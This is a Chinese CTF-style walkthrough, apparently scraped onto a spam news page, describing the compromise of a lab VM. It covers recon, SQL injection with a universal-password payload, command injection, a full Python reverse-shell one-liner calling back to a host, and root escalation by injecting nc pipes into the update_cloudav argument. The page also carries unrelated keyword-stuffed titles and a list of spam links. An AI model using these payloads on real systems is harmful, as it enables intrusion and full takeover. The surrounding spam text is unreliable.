当前位置: 首页 > news >正文

可以用来做论文引用的网站网站建设十年杜绝模板

可以用来做论文引用的网站,网站建设十年杜绝模板,游戏登录器列表更新网站建设,代理ip免费软件目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP, netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口: 开放22和8080,看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第…

目录

信息搜集

WEB漏洞攻击

拿shell


信息搜集

首先ifconfig查看自己IP,

netdiscover查看同网段下主机

第三个应该是目标靶机。用nmap查看靶机开放端口:

开放22和8080,看看8080开的啥服务

WEB漏洞攻击

看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

Flask框架,最后一段报错信息直接看到搜索逻辑源码

输入其它内容时全部回显

推断布尔盲注,order by 尝试字段数

1" order by 1--+ 正常

1" order by 2--+ 报错

后续尝试

1" and left(version(),1)=5 --+

无果

直接万能密码开摆:

1" or 1=1 --+

emmmm,进来了

还是看看能否RCE

输入111|ls

拿shell

出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

看看文件权限

有一个ROOT文件,下面有它的C文件,读一下看看

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

拿到ROOT权限

http://www.yayakq.cn/news/495269/

相关文章:

  • 一站式进货平台网站建设湛江小程序开发公司
  • 网站建设维护保密协议网站设计风格分析
  • php怎么做网站网络规划设计师属于高级职称吗
  • 个人网站设计论文范文wordpress侧栏高度
  • 在百度怎么建立自己的网站吗tk免费域名注册网站
  • ysl千人千色t9t9t9t9合肥网络优化公司有几家
  • 网站建设的业务流程图哪些网站容易做seo优化
  • 改变关键词对网站的影响公司自己的网站叫什么
  • 怎样破解网站后台密码设计公司logo设计大全
  • tk网站的dns修改电商网站基本功能
  • 济南网站建设代理怎样进入wordpress仪表盘
  • 南宁做网站方案做网站客户最关心的是什么
  • oa系统是什么意思啊排名优化外包公司
  • 睢宁网站制作建设网站怎么收费
  • 建设解锁卡网站首页东莞华为外包公司
  • 互联网行业信息网站建筑学长官网
  • 新网站建设运营年计划湘西州建设银行网站
  • 深圳建网站兴田德润实惠php购物网站开发背景
  • 网站登陆系统怎么做营销是做什么
  • 建设银行的网站特点网络推广加盟项目
  • 微网站制作工具温泉酒店网站建设方案
  • 国内做外贸网站的有哪些资料网站如何让百度抓取
  • 北京网站建设有哪些才艺多网站建设公司
  • qq人脸解冻自助网站网站建设怎么找客源
  • 做网站充值微信必须是企业网站建设app开发合同
  • 动漫毕业设计作品网站嵌入式软件能干一辈子
  • 高毅资产网站谁做的网页版梦幻西游虎灯令
  • 信用网站系统建设方案重庆建设工程人力资源官网
  • 零基础做地方门户网站写作网站排行榜
  • logo设计制作网站项目管理软件应用